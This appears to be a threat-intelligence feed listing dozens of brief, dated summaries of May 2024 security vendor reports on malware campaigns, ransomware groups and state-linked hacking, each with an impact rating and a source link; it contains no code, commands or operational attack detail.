Cyble researchers have identified a campaign utilizing malicious .LNK files masquerading as a PDF document. Upon execution, the .LNK file loads and displays a human rights seminar invitation as a lure document, suggesting that the threat actor targets individuals with a background or interest in human rights issues.
Source: https://cyble.com/blog/tiny-backdoor-goes-undetected-suspected-turla-leveraging-msbuild-to-evade-detection/
2024-05-21
Void_Mantocore_Destructive_Activities_in_Israel
MEDIUM
Intel Source:
Checkpoint
Intel Name:
Void_Mantocore_Destructive_Activities_in_Israel
Date of Scan:
2024-05-21
Impact:
MEDIUM
Summary:
CheckPoint researchers have found that the Iranian hacker group Void Manticore, also known as Storm-842, is linked to Iran's Ministry of Intelligence and Security (MOIS). They carry out destructive attacks and leak stolen information online. The group uses fake identities like "Homeland Justice" for attacks in Albania and "Karma" for attacks in Israel. They use simple methods and custom programs for both Windows and Linux systems, sometimes manually deleting files and using tools to move around the victim's network. Recently, they have been targeting Israeli organizations with a special wiper called BiBi, named after Israeli Prime Minister Benjamin Netanyahu, highlighting their political motives.
Source: https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/
2024-05-21
Rhadamanthys_Stealer_Malware_Analysis
LOW
Intel Source:
Any.Run
Intel Name:
Rhadamanthys_Stealer_Malware_Analysis
Date of Scan:
2024-05-21
Impact:
LOW
Summary:
Rhadamanthys is a C++ information-stealing malware that extracts sensitive data from infiltrated machines. Its layered operational chain and advanced evasion tactics make it a major risk in cybersecurity landscapes.
Source: https://any.run/malware-trends/rhadamanthys
2024-05-21
UAC0006_Intensifies_Cyberattacks_And_Threatening_Financial_Networks
MEDIUM
Intel Source:
CERT-UA
Intel Name:
UAC0006_Intensifies_Cyberattacks_And_Threatening_Financial_Networks
Date of Scan:
2024-05-21
Impact:
MEDIUM
Summary:
CERT-UA researchers have identified that the financially motivated cybercriminal group UAC-0006 has significantly ramped up its activities, particularly targeting financial systems. Employing SMOKELOADER malware distributed through email campaigns containing ZIP archives with malicious files, the group aims to infiltrate systems and deploy harmful programs like TALESHOT and RMS.
Source: https://cert.gov.ua/article/6279366
2024-05-20
A_Sophisticated_Android_Banking_Trojan_Targeting_Multilingual_Users
MEDIUM
Intel Source:
Cyble
Intel Name:
A_Sophisticated_Android_Banking_Trojan_Targeting_Multilingual_Users
Date of Scan:
2024-05-20
Impact:
MEDIUM
Summary:
Antidot, a newly identified Android Banking Trojan, camouflages itself as a Google Play update application, featuring multilingual fake update pages to broaden its victim pool. Employing sophisticated tactics like overlay attacks, keylogging, and WebSocket communication with a Command and Control (C&C) server, Antidot enables real-time interaction for executing malicious commands, including SMS collection and remote device manipulation. Notably, it utilizes MediaProjection to implement VNC for remote control of compromised devices. This discovery, alongside recent findings on the Brokewell Android Banking Trojan by Cyble Research and Intelligence Labs (CRIL), underscores the escalating sophistication of mobile malware threats.
Source: https://cyble.com/blog/new-antidot-android-banking-trojan-masquerading-as-google-play-updates/
2024-05-20
Multi_Component_Banking_Trojan_and_Its_Expanding_LATAM_Focused_Campaigns
MEDIUM
Intel Source:
Security Intelligence
Intel Name:
Multi_Component_Banking_Trojan_and_Its_Expanding_LATAM_Focused_Campaigns
Date of Scan:
2024-05-20
Impact:
MEDIUM
Summary:
Grandoreiro is a sophisticated banking trojan operating globally as Malware-as-a-Service (MaaS). It targets over 1500 banking applications across 60+ countries, with a recent surge in phishing campaigns impersonating government entities in Latin America. These campaigns, notably in Mexico and Argentina, employ urgent messages to lure victims into downloading malicious files disguised as legitimate documents. With advanced features like string decryption and dynamic domain generation, Grandoreiro poses a significant threat to online banking security, highlighting the evolving landscape of cyber threats in the region.
Source: https://securityintelligence.com/x-force/grandoreiro-banking-trojan-unleashed/
2024-05-17
An_Examination_of_Metamorfo_Banking_Trojan
LOW
Intel Source:
Forcepoint
Intel Name:
An_Examination_of_Metamorfo_Banking_Trojan
Date of Scan:
2024-05-17
Impact:
LOW
Summary:
Researchers at Forcepoint have noticed a recent rise in the incidence of banking trojans and delved into one specific campaign. This malware, also known as Metamorfo, spreads via malspam campaigns that entice victims to click on HTML attachments. Once the attachment is clicked, a sequence of actions begins with the goal of collecting system metadata.
Source: https://www.forcepoint.com/blog/x-labs/exploring-metamorfo-banking-malware
2024-05-17
XMRig_Malware_Deployment_and_Defensive_Strategies
LOW
Intel Source:
Uptycs
Intel Name:
XMRig_Malware_Deployment_and_Defensive_Strategies
Date of Scan:
2024-05-17
Impact:
LOW
Summary:
Researchers from Uptycs have discovered a significant, ongoing operation within the Log4j campaign, identified through their honeypot collection. This campaign involves over 1700 dedicated IPs and aims to deploy XMRig cryptominer malware onto targeted systems.
Source: https://www.uptycs.com/blog/log4j-campaign-xmrig-malware
2024-05-16
SugarGh0st_RAT_Aiming_at_US_Artificial_Intelligence_Experts
MEDIUM
Intel Source:
Proofpoint
Intel Name:
SugarGh0st_RAT_Aiming_at_US_Artificial_Intelligence_Experts
Date of Scan:
2024-05-16
Impact:
MEDIUM
Summary:
Researchers at Proofpoint have discovered a SugarGh0st RAT campaign targeting organizations in the United States engaged in artificial intelligence efforts, including those in government, the private sector, and academia. They identify the cluster responsible for this activity as UNK_SweetSpecter.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-artificial-sweetener-sugargh0st-rat-used-target-american
2024-05-16
Leveraging_Tesseract_for_Image_File_Exfiltration
LOW
Intel Source:
ASEC
Intel Name:
Leveraging_Tesseract_for_Image_File_Exfiltration
Date of Scan:
2024-05-16
Impact:
LOW
Summary:
ASEC researchers have uncovered a new tactic employed by ViperSoftX attackers, who use the Tesseract OCR engine to exfiltrate users' image files. ViperSoftX, a persistent malware strain, is known for executing attackers' commands and stealing cryptocurrency-related information. The report highlights the recent discovery of ViperSoftX's use of Tesseract, focusing on its modus operandi and recent developments. The malware reads images stored on infected systems and extracts strings from them using Tesseract.
Source: https://asec.ahnlab.com/en/65426/
2024-05-16
Infiltration_of_a_European_Ministry_of_Foreign_Affairs
LOW
Intel Source:
Welivesecurity
Intel Name:
Infiltration_of_a_European_Ministry_of_Foreign_Affairs
Date of Scan:
2024-05-16
Impact:
LOW
Summary:
ESET researchers have uncovered the Lunar toolset, believed to be wielded by the Turla APT group, infiltrating a European ministry of foreign affairs (MFA) and its diplomatic missions abroad. This comprehensive analysis delves into two newly discovered backdoors, LunarWeb and LunarMail, employed in these breaches. Operating since at least 2020, the Lunar toolset employs advanced techniques like steganography and intricate communication methods to evade detection. The attackers, with a history of targeting high-profile entities, including governmental and diplomatic organizations, demonstrate sophisticated tactics. The post outlines victimology, initial access routes, and the complex workings of the Lunar toolset, shedding light on the intricate methods utilized by the threat actor.
Source: https://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/
2024-05-16
Embedded_payloads_abuse_Microsoft_OneNote_files
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Embedded_payloads_abuse_Microsoft_OneNote_files
Date of Scan:
2024-05-16
Impact:
MEDIUM
Summary:
The article by Ashkan Hosseosh Chitwadgi from Palo Alto Networks' Unit 42 blog discusses the increasing use of Microsoft OneNote for embedding malicious payloads, primarily for phishing. Analysis of around 6,000 OneNote samples reveals that 99.9% contain images to lure users. Attackers exploit OneNote's flexibility to embed various payloads like JavaScript, VBScript, PowerShell, and HTA, shifting away from traditional macros. The article details the payload types, sizes, and methods to identify them, emphasizing the need for robust cybersecurity measures, including Palo Alto Networks' solutions. It concludes with a technical analysis of a specific payload, highlighting OneNote's versatility as an attack vector.
Source: https://unit42.paloaltonetworks.com/payloads-in-malicious-onenote-samples/
2024-05-16
The_Toolkit_Added_a_New_Linux_Backdoor_Named_Springtail
MEDIUM
Intel Source:
Symantec
Intel Name:
The_Toolkit_Added_a_New_Linux_Backdoor_Named_Springtail
Date of Scan:
2024-05-16
Impact:
MEDIUM
Summary:
Researchers from Symantec have discovered a new Linux backdoor developed by the North Korean espionage group Springtail, also known as Kimsuky. This backdoor is connected to malware that was recently used in an attack on South Korean organizations. The GoBear backdoor, which was used in a recent Springtail campaign in which the attackers distributed malware through Trojanized software installation packages, looks to be a Linux version of the Linux.Gomir backdoor. Gomir and GoBear share a great deal of code, making them nearly architecturally identical.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/springtail-kimsuky-backdoor-espionage
2024-05-16
A_Deep_Dive_into_Waterbear_and_Deuterbear_Malware
LOW
Intel Source:
Trend Micro
Intel Name:
A_Deep_Dive_into_Waterbear_and_Deuterbear_Malware
Date of Scan:
2024-05-16
Impact:
LOW
Summary:
Trend Micro researchers have delved into Earth Hundun's sophisticated cyberespionage campaign targeting the Asia-Pacific region, focusing on the Waterbear and Deuterbear malware variants. The report provides detailed insights into their operation, installation processes, and RAT functionalities, along with a comparative analysis highlighting the evolution from Waterbear to Deuterbear.
Source: https://www.trendmicro.com/en_us/research/24/e/earth-hundun-2.html
2024-05-15
Exploitation_oF_FOXIT_PDF
LOW
Intel Source:
Checkpoint
Intel Name:
Exploitation_oF_FOXIT_PDF
Date of Scan:
2024-05-15
Impact:
LOW
Summary:
Researchers at Checkpoint have discovered an unusual pattern of activity concerning the exploitation of PDFs, mostly aimed at Foxit Reader users. This exploit triggers security alerts that can trick unsuspecting users into executing harmful commands. Additionally, variants of this vulnerability were seen being actively used in the wild. Since Adobe Reader is susceptible to this particular exploit, its low detection rate is explained by the reality that most sandboxes and antivirus programs use it. Furthermore, a variety of exploit builders, from Python to .NET code, are being used to distribute the exploitable vulnerability.
Source: https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/
2024-05-15
LockBit_Resilience_Unveiled
HIGH
Intel Source:
Coinmonks
Intel Name:
LockBit_Resilience_Unveiled
Date of Scan:
2024-05-15
Impact:
HIGH
Summary:
Researchers at Coinmonks have seen that the LockBit ransomware group makes a strong return despite law enforcement's efforts in Operation Cronos, showing flexibility in victimization tactics, infrastructure, and dissemination methods. The rumored identity of LockBitSupp has now come to light, adding mystery to the ransomware scene, which is further complicated by affiliates and imitators.
Source: https://medium.com/coinmonks/the-return-of-lockbit-8d7bcb9b75fa
2024-05-15
Transparent_Tribe_And_SideCopy_APT_Groups_Targeting_India
MEDIUM
Intel Source:
Cyble
Intel Name:
Transparent_Tribe_And_SideCopy_APT_Groups_Targeting_India
Date of Scan:
2024-05-15
Impact:
MEDIUM
Summary:
Cyble Research team recently discovered a malicious website associated with the SideCopy APT group. The researchers noticed that SideCopy targeted university students, as evidenced by the lure document. Notably, Transparent Tribe is known for targeting universities, suggesting a potential intersection between these two APT groups.
Source: https://cyble.com/blog/the-overlapping-cyber-strategies-of-transparent-tribe-and-sidecopy-against-india/
2024-05-15
Ebury_Malware_Campaign
MEDIUM
Intel Source:
ESET
Intel Name:
Ebury_Malware_Campaign
Date of Scan:
2024-05-15
Impact:
MEDIUM
Summary:
The ESET research team has uncovered a persistent and evolving server-side malware campaign known as Ebury, which has grown over the years to compromise thousands of servers. Researchers use special traps to catch Ebury, but the increasing sophistication of the malware has made detection more challenging. The hackers behind Ebury target companies that rent out servers and use a sneaky trick to intercept passwords. They've hit over 200 servers, especially those used for cryptocurrency. Ebury steals cryptocurrency wallets when people log in, and over 400,000 servers have been compromised since 2009. Some new malware families connected to Ebury can also steal financial information from websites.
Source: https://www.welivesecurity.com/en/eset-research/ebury-alive-unseen-400k-linux-servers-compromised-cryptotheft-financial-gain/
2024-05-15
Exposing_the_Darkgate_Campaign
LOW
Intel Source:
Forcepoint
Intel Name:
Exposing_the_Darkgate_Campaign
Date of Scan:
2024-05-15
Impact:
LOW
Summary:
Researchers from Forcepoint have examined the details of a recent Darkgate phishing campaign. This investigation reveals the attackers' subtle strategies and advanced capabilities, from the initial lure of a fake QuickBooks invoice to the delivery of complex malware payloads.
Source: https://www.forcepoint.com/blog/x-labs/phishing-script-inside-darkgate-campaign
2024-05-14
LockBit_Black_Ransomware_Spreading_Through_Millions_of_Messages
HIGH
Intel Source:
Proofpoint
Intel Name:
LockBit_Black_Ransomware_Spreading_Through_Millions_of_Messages
Date of Scan:
2024-05-14
Impact:
HIGH
Summary:
Researchers at Proofpoint have seen large-scale campaigns that use millions of messages to spread the LockBit Black ransomware, made possible by the Phorpiex botnet. This is the first time Proofpoint researchers have seen so many samples of LockBit Black ransomware (also known as LockBit 3.0) spread via Phorpiex. The LockBit Black sample from this campaign was most likely generated using the LockBit builder that was leaked in the summer of 2023.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-millions-messages-distribute-lockbit-black-ransomware
2024-05-14
Ongoing_Social_Engineering_Campaign_Linked_to_Black_Basta_Ransomware
MEDIUM
Intel Source:
Rapid7
Intel Name:
Ongoing_Social_Engineering_Campaign_Linked_to_Black_Basta_Ransomware
Date of Scan:
2024-05-14
Impact:
MEDIUM
Summary:
Rapid7 researchers have discovered an ongoing social engineering campaign targeting multiple managed detection and response (MDR) customers. The activity involves a threat actor inundating a user's email with spam and then calling the person to offer assistance. The threat actor instructs affected users to use Microsoft's built-in Quick Assist feature or to download remote monitoring and management tools such as AnyDesk in order to create a remote connection. After establishing the remote connection, the threat actor proceeds to retrieve payloads from their infrastructure with the aim of obtaining the affected user's credentials and maintaining persistence on the affected user's asset.
Source: https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/
2024-05-14
Examining_SolarMarker_Multi_tiered_Infrastructure_in_Depth
MEDIUM
Intel Source:
Recorded Future
Intel Name:
Examining_SolarMarker_Multi_tiered_Infrastructure_in_Depth
Date of Scan:
2024-05-14
Impact:
MEDIUM
Summary:
Researchers from the Insikt Group have discovered the multi-tiered infrastructure that is employed by the information-stealing malware known as SolarMarker, which has been around since 2020 and is also known as Yellow Cockatoo, Polazert, and Jupyter Infostealer. The malware targets industries like SMEs, healthcare, and education. It uses sophisticated evasion methods, such as Authenticode certificates and large zip files, to evade detection.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0513.pdf
2024-05-14
The_North_Korean_hacking_group_Kimsuky_latest_activity
MEDIUM
Intel Source:
GBhackers
Intel Name:
The_North_Korean_hacking_group_Kimsuky_latest_activity
Date of Scan:
2024-05-14
Impact:
MEDIUM
Summary:
The North Korean hacking group Kimsuky has been observed using sophisticated methods to conduct espionage activities, including the exploitation of social media platforms and system management tools.
Source: https://gbhackers.com/north-korean-hackers-abusing/
2024-05-14
The_Menace_Hidden_in_Job_Application_Emails
LOW
Intel Source:
ASEC
Intel Name:
The_Menace_Hidden_in_Job_Application_Emails
Date of Scan:
2024-05-14
Impact:
LOW
Summary:
AhnLab's Security Intelligence Center researchers have delved into the intricacies of DanaBot malware, exposing its propagation via email attachments containing external links. Through a series of diagrams generated by AhnLab's EDR product, the post delineates the infection flow, from the initial email attachment execution to the deployment of DanaBot. The sophisticated disguise of the email as a job application form underscores the deceptive tactics employed by threat actors.
Source: https://asec.ahnlab.com/en/65399/
2024-05-14
Github_Repository_for_Malicious_Infrastructure
MEDIUM
Intel Source:
Recorded Future
Intel Name:
Github_Repository_for_Malicious_Infrastructure
Date of Scan:
2024-05-14
Impact:
MEDIUM
Summary:
The Insikt Group uncovered a large cybercrime campaign in which Russian-speaking cybercriminals from the Commonwealth of Independent States (CIS) used fake profiles and repositories on GitHub to distribute malware masquerading as popular software such as 1Password and Pixelmator Pro. This malware aims to steal personal information. These hackers work together and share a control system, indicating a coordinated attack plan.
Source: https://www.recordedfuture.com/gitcaught-threat-actor-leverages-github-repository-for-malicious-infrastructure
2024-05-14
Malware_disguised_as_MS_Office_crack
LOW
Intel Source:
ASEC
Intel Name:
Malware_disguised_as_MS_Office_crack
Date of Scan:
2024-05-14
Impact:
LOW
Summary:
ASEC analysts reported the details of an ongoing malware campaign targeting South Korean users, which disguises malicious payloads as cracked versions of Microsoft Office and other popular software. The attackers are distributing a variety of malware, including downloaders, coin miners, remote access tools (RATs), proxies, and anti-antivirus components. These are installed persistently through scheduled tasks and utilize encoded PowerShell commands for updates. The primary malware families identified include Orcus RAT for system control, XMRig crypto-miner, 3Proxy for creating a proxy network, and components to evade security products.
Source: https://asec.ahnlab.com/ko/65307/
2024-05-14
A_Newly_Identified_Ransomware_Variant_Trinity
LOW
Intel Source:
Cyble
Intel Name:
A_Newly_Identified_Ransomware_Variant_Trinity
Date of Scan:
2024-05-14
Impact:
LOW
Summary:
CRIL researchers have observed a new ransomware variant called Trinity. This variant employs a double extortion technique to target victims. The Threat Actors behind Trinity ransomware utilize both victim support and data leak sites. CRIL also observed similarities between Trinity and Venus ransomware, such as registry value usage and mutex naming conventions.
Source: https://cyble.com/blog/in-the-shadow-of-venus-trinity-ransomwares-covert-ties/
2024-05-14
The_distribute_of_trojanized_installers_for_WinSCP_and_PuTTY
MEDIUM
Intel Source:
Rapid7
Intel Name:
The_distribute_of_trojanized_installers_for_WinSCP_and_PuTTY
Date of Scan:
2024-05-14
Impact:
MEDIUM
Summary:
Rapid7 analysts discussed in their blog an ongoing malvertising campaign that leads to ransomware attacks. The campaign involves distributing trojanized installers for popular utilities through malicious ads on search engines. The malware uses various techniques, such as DLL side-loading and reflective DLL injection, to evade detection and establish persistence. The article also provides a technical analysis of the malware delivery and execution process, as well as a list of files and indicators associated with the campaign. It concludes with recommendations for mitigating the threat and preventing similar campaigns in the future.
Source: https://www.rapid7.com/blog/post/2024/05/13/ongoing-malvertising-campaign-leads-to-ransomware/
2024-05-13
FakeBat_malware_loader
LOW
Intel Source:
Threatdown
Intel Name:
FakeBat_malware_loader
Date of Scan:
2024-05-13
Impact:
LOW
Summary:
FakeBat (EugenLoader) is a type of malware loader that is packaged in Microsoft installers (MSI or MSIX) and distributed via social engineering lures. It is most commonly delivered via malicious ads (malvertising) on Google.
Source: https://www.threatdown.com/blog/fakebat-05-05-2024/
2024-05-13
Ransomware_Disguised_in_Copyright_Violation_Warnings_and_Resumes
LOW
Intel Source:
ASEC
Intel Name:
Ransomware_Disguised_in_Copyright_Violation_Warnings_and_Resumes
Date of Scan:
2024-05-13
Impact:
LOW
Summary:
ASEC researchers have revealed a surge in malware distribution camouflaged as copyright violation notices and job resumes, targeting unsuspecting users. The evolution in tactics includes employing external links in emails to prompt downloads of compressed files containing ransomware and Infostealers. The analysis unveils the intricacies of the Beast ransomware, encrypting files and seeking lateral movement via SMB ports, alongside the Vidar Infostealer, adept at extracting sensitive user data.
Source: https://asec.ahnlab.com/en/65364/
2024-05-13
AnotherP_Fake_Forum_Post_Leads_to_GootLoader_Malware
LOW
Intel Source:
Palo Alto
Intel Name:
AnotherP_Fake_Forum_Post_Leads_to_GootLoader_Malware
Date of Scan:
2024-05-13
Impact:
LOW
Summary:
Palo Alto researchers have discovered that a Google search on a certain topic leads to a compromised website that contains a fake forum post and a downloadable zip file. wscript.exe then launches the .js file from the downloaded zip file, which is followed by GootLoader C2 traffic and post-infection activity.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-05-09-IOCs-from-GootLoader-activity.txt
2024-05-13
GoTo_Meeting_Leverages_Rust_Shellcode_Loader_to_Initiate_Remcos_RAT_Execution
LOW
Intel Source:
G DATA
Intel Name:
GoTo_Meeting_Leverages_Rust_Shellcode_Loader_to_Initiate_Remcos_RAT_Execution
Date of Scan:
2024-05-13
Impact:
LOW
Summary:
G DATA researchers have discovered that cyber attackers exploit trusted applications like GoTo Meeting to deploy malware such as the Remcos RAT. The attack involves disguising malicious payloads within inoffensive files and initiating events that evade detection. Techniques like DLL sideloading and shellcode execution are utilized, alongside decoy documents, to lower suspicion. The attack's complexity extends to various languages and tailored lures, targeting diverse user groups.
Source: https://www.gdatasoftware.com/blog/2024/05/37906-gotomeeting-loads-remcos
2024-05-13
Three_recent_campaigns_using_DNS_tunneling
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Three_recent_campaigns_using_DNS_tunneling
Date of Scan:
2024-05-13
Impact:
MEDIUM
Summary:
Palo Alto research team shared the details of their case study on new applications of domain name system (DNS) tunneling that they found in the wild. These techniques expand beyond DNS tunneling only for command and control (C2) and virtual private network (VPN) purposes.
Source: https://unit42.paloaltonetworks.com/three-dns-tunneling-campaigns/
2024-05-11
A_new_mining_Trojan_attack
LOW
Intel Source:
Antiy
Intel Name:
A_new_mining_Trojan_attack
Date of Scan:
2024-05-11
Impact:
LOW
Summary:
Recently, Antiy CERT observed a new mining Trojan attack through network security monitoring. This mining Trojan started back in November 2023, and its components were changed many times during this period. The mining Trojan attack continues to be active, and the number of infections is on the rise. Its main features are strong concealment, anti-analysis, a DLL hijacking backdoor, and shellcode injection. Antiy CERT named the mining Trojan "Hidden Shovel".
Source: https://www.antiy.cn/research/notice&report/research_report/HideShoveling.html
2024-05-10
Analysis_of_Dark_Web_Profile_APT31
LOW
Intel Source:
SOC Radar
Intel Name:
Analysis_of_Dark_Web_Profile_APT31
Date of Scan:
2024-05-10
Impact:
LOW
Summary:
SOC Radar researchers have analyzed APT31, a sophisticated cyber threat group believed to operate on behalf of the Chinese government. The analysis highlights the group's tactics, including malware deployment and spear-phishing campaigns, and discusses a recent indictment by the United States Department of Justice charging seven individuals associated with APT31 with conspiracy to commit computer intrusions and wire fraud. It emphasizes APT31's targeting of various entities, including U.S. government officials and businesses, and offers security recommendations to mitigate the threat posed by this group. Overall, it underscores the importance of vigilance and robust cybersecurity measures in countering APT31's activities.
Source: https://socradar.io/dark-web-profile-apt31/
2024-05-10
Attack_on_Cloud_Hosted_AI_Models_via_LLMjacking_Scheme
MEDIUM
Intel Source:
Sysdig
Intel Name:
Attack_on_Cloud_Hosted_AI_Models_via_LLMjacking_Scheme
Date of Scan:
2024-05-10
Impact:
MEDIUM
Summary:
Researchers at Sysdig have discovered a new attack they call LLMjacking, which targets ten cloud-hosted large language model (LLM) services using stolen cloud credentials. The credentials were taken from a well-known type of target: a machine running a vulnerable Laravel version (CVE-2021-3129).
Source: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
2024-05-10
Black_Basta_ransomware_activity_details
HIGH
Intel Source:
CISA
Intel Name:
Black_Basta_ransomware_activity_details
Date of Scan:
2024-05-10
Impact:
HIGH
Summary:
CISA, in cooperation with the FBI, the HHS, and the Multi-State Information Sharing and Analysis Center (MS-ISAC), released a joint security advisory about Black Basta ransomware, providing cybersecurity defenders with the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) used by the group. Black Basta is a ransomware-as-a-service (RaaS) variant first discovered in April 2022. It has attacked over 500 private industry and critical infrastructure entities, including healthcare organizations, in North America, Europe, and Australia.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a
2024-05-10
A_new_macOS_malware_family_Cuckoo_Stealer
LOW
Intel Source:
SentinelOne
Intel Name:
A_new_macOS_malware_family_Cuckoo_Stealer
Date of Scan:
2024-05-10
Impact:
LOW
Summary:
This year, infostealers targeting macOS devices have been on the rise, with variants such as Atomic Stealer (Amos), RealStealer (Realst), MetaStealer, and others widely distributed in the wild via malicious websites, cracked applications, and trojanized installers. Recently, a new macOS malware family that researchers have named 'Cuckoo Stealer' drew SentinelOne's attention because it acts as both an infostealer and spyware.
Source: https://www.sentinelone.com/blog/macos-cuckoo-stealer-ensuring-detection-and-defense-as-new-samples-rapidly-emerge/
2024-05-09
SocGholish_infection_initiated_by_a_fake_browser_update
LOW
Intel Source:
Esentire
Intel Name:
SocGholish_infection_initiated_by_a_fake_browser_update
Date of Scan:
2024-05-09
Impact:
LOW
Summary:
eSentire's Threat Unit provided a summary of a recent threat investigation. Last month, eSentire's Threat Unit researchers observed hands-on-keyboard activity and traced it to a SocGholish infection initiated by a fake browser update. The fake update used obfuscated JavaScript to evade detection and establish a foothold in the environment.
Source: https://www.esentire.com/blog/socgholish-sets-sights-on-victim-peers
2024-05-09
CopyCop_campaign_weaponizing_AI_for_influence
MEDIUM
Intel Source:
Recorded Future
Intel Name:
CopyCop_campaign_weaponizing_AI_for_influence
Date of Scan:
2024-05-09
Impact:
MEDIUM
Summary:
In March 2024, Insikt Group discovered a large network of inauthentic United States (US), United Kingdom (UK), and French media outlets publishing political content at scale, generated with large language models (LLMs), about the US, UK, Ukraine, Israel, and France. Insikt Group named the network CopyCop; it is operated from Russia and is likely aligned with the Russian government. The network uses generative artificial intelligence (AI) to plagiarize, translate, and edit content from mainstream media outlets, using prompt engineering to tailor content to specific audiences and introduce political bias.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0509.pdf
2024-05-09
Phishing_Scam_Exploiting_Italian_Government_Name_and_Tax_Refund_Promise
MEDIUM
Intel Source:
CERT-AGID
Intel Name:
Phishing_Scam_Exploiting_Italian_Government_Name_and_Tax_Refund_Promise
Date of Scan:
2024-05-09
Impact:
MEDIUM
Summary:
CERT-AGID researchers have identified a concerning phishing campaign targeting Italian citizens, which falsely promises tax refunds while exploiting the name and logos of the Presidency of the Council of Ministers. The phishing emails claim recipients are entitled to a refund of €268.30 and create a sense of urgency by stating the offer expires within five working days. Recipients are directed to click a link that redirects them to a fraudulent page, aiming to trick them into providing their banking credentials.
Source: https://cert-agid.gov.it/news/phishing/phishing-multibanking-sfrutta-nome-e-loghi-della-presidenza-del-consiglio-dei-ministri/
2024-05-09
FIN7_distributes_MSIX_payloads
LOW
Intel Source:
Esentire
Intel Name:
FIN7_distributes_MSIX_payloads
Date of Scan:
2024-05-09
Impact:
LOW
Summary:
Last month, eSentire's Threat Unit researchers discovered multiple incidents involving FIN7, a financially motivated threat group from Russia. The threat actors used malicious websites impersonating well-known brands, including AnyDesk, WinSCP, BlackRock, Asana, Concur, The Wall Street Journal, Workable, and Google Meet. In their article, eSentire's Threat Unit examines these incidents, in which FIN7 delivered NetSupport RAT and DiceLoader as the subsequent stage in the infection chain.
Source: https://www.esentire.com/blog/fin7-uses-trusted-brands-and-sponsored-google-ads-to-distribute-msix-payloads
2024-05-09
APT_28_Targeting_against_Polish_govt_institutions
MEDIUM
Intel Source:
CERT.PL
Intel Name:
APT_28_Targeting_against_Polish_govt_institutions
Date of Scan:
2024-05-09
Impact:
MEDIUM
Summary:
CERT Polska has observed a malicious e-mail campaign conducted by the APT28 group against Polish government institutions. This group is associated with the General Staff of the Armed Forces of the Russian Federation (GRU). In this campaign, the attackers sent an email claiming to have found information about a woman from Ukraine who is in Poland running a strange business. The email contained a link to a fake website from which a ZIP file was downloaded. Inside the ZIP file were three files: a fake photo file that was actually a program, a hidden batch file, and a fake Windows library file.
Source: https://cert.pl/en/posts/2024/05/apt28-kampania/
2024-05-08
RemcosRAT_Spreading_Using_Steganography
LOW
Intel Source:
ASEC
Intel Name:
RemcosRAT_Spreading_Using_Steganography
Date of Scan:
2024-05-08
Impact:
LOW
Summary:
Researchers from ASEC have discovered that RemcosRAT is being distributed via steganography. The attack starts with a Word document that uses the template injection technique. Next, an RTF file is downloaded and run to exploit an equation editor vulnerability (EQNEDT32.EXE).
Source: https://asec.ahnlab.com/en/65111/
2024-05-08
Meterpreter_backdoor_being_distributed_from_a_Korean_website
LOW
Intel Source:
Tqt-group
Intel Name:
Meterpreter_backdoor_being_distributed_from_a_Korean_website
Date of Scan:
2024-05-08
Impact:
LOW
Summary:
ASEC has observed evidence of a malware strain being distributed to web servers in South Korea that redirects users to an illegal gambling site. After initially infiltrating a poorly managed Windows Internet Information Services (IIS) web server in Korea, the threat actor installed the Meterpreter backdoor, a port forwarding tool, and an IIS module malware tool. The attacker's goal is to collect information on the target before installing the IIS module malware.
Source: https://tqt-group.co.uk/2024/05/08/case-of-malware-distribution-linking-to-illegal-gambling-website-targeting-korean-web-server/
2024-05-08
The_malicious_download_leads_to_Nitrogen_malware
LOW
Intel Source:
Threatdown
Intel Name:
The_malicious_download_leads_to_Nitrogen_malware
Date of Scan:
2024-05-08
Impact:
LOW
Summary:
Threatdown analysts describe in their blog a campaign that tricks potential victims, including system administrators, with a malicious ad for Advanced IP Scanner, a well-known networking tool. The malicious download leads to Nitrogen malware, which is used as initial access for ransomware deployment.
Source: https://www.threatdown.com/blog/nitrogen-05-03-2024/
2024-05-08
The_details_of_a_Medusa_ransomware_attack
MEDIUM
Intel Source:
Threatdown
Intel Name:
The_details_of_a_Medusa_ransomware_attack
Date of Scan:
2024-05-08
Impact:
MEDIUM
Summary:
Last month, a prominent service chain in the United States became a victim of a Medusa ransomware attack. Threatdown analysts studied the attack’s framework, exploring the chronological events, key indicators of compromise (IOCs), and steps the ThreatDown MDR team took to mitigate the infection.
Source: https://www.threatdown.com/blog/the-anatomy-of-a-medusa-ransomware-attack-threatdown-mdr-team-investigates/
2024-05-08
The_observed_instances_of_Mirai_botnet_delivery_in_the_wild
HIGH
Intel Source:
Juniper
Intel Name:
The_observed_instances_of_Mirai_botnet_delivery_in_the_wild
Date of Scan:
2024-05-08
Impact:
HIGH
Summary:
Juniper researchers observed exploitation attempts targeting Ivanti Pulse Secure authentication bypass and remote code execution vulnerabilities. They also discovered instances of Mirai botnet delivery in the wild using this exploit chain. The exploit facilitates malware delivery and poses a significant threat of network-wide compromise.
Source: https://blogs.juniper.net/en-us/security/protecting-your-network-from-opportunistic-ivanti-pulse-secure-vulnerability-exploitation
2024-05-08
The_Distribution_of_zEus_Stealer
MEDIUM
Intel Source:
Fortinet
Intel Name:
The_Distribution_of_zEus_Stealer
Date of Scan:
2024-05-08
Impact:
MEDIUM
Summary:
Researchers from Fortinet examined a batch stealer distributed via a crafted Minecraft source pack which is embedded in a WinRAR self-extract file. The zEus stealer malware has been added to a source pack that was being shared on YouTube. The "zEus" name is also found in a profile of the Discord webhook receiving stolen data.
Source: https://www.fortinet.com/blog/threat-research/zeus-stealer-distributed-via-crafted-minecraft-source-pack
2024-05-08
CHM_Malware_Targeting_Users_in_Korea
LOW
Intel Source:
ASEC
Intel Name:
CHM_Malware_Targeting_Users_in_Korea
Date of Scan:
2024-05-08
Impact:
LOW
Summary:
